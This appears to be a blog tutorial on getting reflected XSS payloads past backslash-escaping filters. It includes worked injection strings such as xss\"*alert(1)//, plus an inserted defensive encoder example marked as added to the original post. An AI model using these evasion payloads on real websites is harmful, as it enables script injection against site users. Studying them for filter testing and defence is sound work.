Escaping Escapes

Sometimes a server will escape special characters that are injected. For instance, injecting a " character and having it reflect as \":

Injection: xss"
Reflection:

x="xss\"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"
Reflection:

x="xss\\"";y=42;

Success!

However, if the server escapes your injected \ as \\, this technique will not work:

Injection: xss\"
Reflection:

x="xss\\\"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*\"
Reflection:

x="xss\\"*alert(1)*\\"";y=42;

The *\\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss\"*alert(1)//
Reflection:

x="xss\\"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they escape your // like \/\/. When this happens, I don’t think there’s much you can do.
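Seen from the server side, everything above depends on whether the backslash itself gets escaped. The added example below (not code from the original post) puts the quotes-only filter beside an encoder that escapes \, " and / in a single pass, and checks both against the injections shown above; the function names and the exact character set are assumptions.

```javascript
// Weak filter described above: escapes " but leaves \ untouched.
function escapeQuotesOnly(s) {
  return s.replace(/"/g, '\\"');
}

// Hardened encoder (assumed design, one pass): backslash is escaped along
// with the quote, so an injected \ can never neutralise the filter's own \.
const JS_ESCAPES = {
  '\\': '\\\\', '"': '\\"', "'": "\\'", '/': '\\/',
  '\n': '\\n', '\r': '\\r', '<': '\\u003c', '>': '\\u003e',
  '\u2028': '\\u2028', '\u2029': '\\u2029',
};
function escapeForJsString(s) {
  return s.replace(/[\\"'\/\n\r<>\u2028\u2029]/g, (c) => JS_ESCAPES[c]);
}

// True if the escaped value, placed inside x="...", ends the literal early
// (an unescaped " or raw line break) or swallows the closing quote
// (a trailing lone \).
function breaksOutOfLiteral(escaped) {
  for (let i = 0; i < escaped.length; i++) {
    if (escaped[i] === '\\') {
      if (i + 1 === escaped.length) return true; // lone \ eats the closing "
      i++;                                        // skip the escaped character
    } else if (escaped[i] === '"' || escaped[i] === '\n' || escaped[i] === '\r') {
      return true;
    }
  }
  return false;
}

// Round trip: evaluate the reflected statement and return the value of x.
// Only call this on output of the hardened encoder.
function reflectAndEvaluate(escaped) {
  return new Function('var x="' + escaped + '";var y=42;return x;')();
}

// Constructed inputs: the injections from the post, plus a lone trailing \.
const samples = ['xss"', 'xss\\"', 'xss\\"*alert(1)//', 'xss\\'];
for (const input of samples) {
  const weak = escapeQuotesOnly(input);
  const hard = escapeForJsString(input);
  console.log(JSON.stringify(input),
    '| quotes-only breaks out:', breaksOutOfLiteral(weak),
    '| hardened breaks out:', breaksOutOfLiteral(hard),
    '| hardened round-trips:', reflectAndEvaluate(hard) === input);
}
```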

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.